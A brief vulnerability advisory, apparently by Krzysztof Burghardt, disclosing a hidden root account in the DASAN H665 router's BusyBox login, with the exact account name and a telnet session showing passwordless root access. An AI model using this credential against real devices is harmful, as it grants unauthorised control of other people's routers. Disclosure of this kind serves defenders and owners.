DASAN H665 Backdoor Account

DASAN H665 has a vendor backdoor built into BusyBox /bin/login that provides remote root access with no password.

MD5 | 8fd617ceb423687bb1cff222714c6ebc


DASAN H665 has vendor backdoor built into BusyBox /bin/login. Account
named "dnsekakf2$$" gives access to admin (uid 0) account over telnet
without any password, at least for administration interface documented
in H665 Quick Guide (subnet on LAN interface).

$ telnet
Connected to
Escape character is '^]'.
tc login: dnsekakf2$$
# uname -a
Linux tc 2.6.36 #1 SMP Wed Jan 3 09:32:57 UTC 2018 mips unknown
# tail -n1 /data/log/messages
Feb 15 16:59:26 login[26929]: Try to connect using hidden account

For longer version visit:

Krzysztof Burghardt <[email protected]>

Related Posts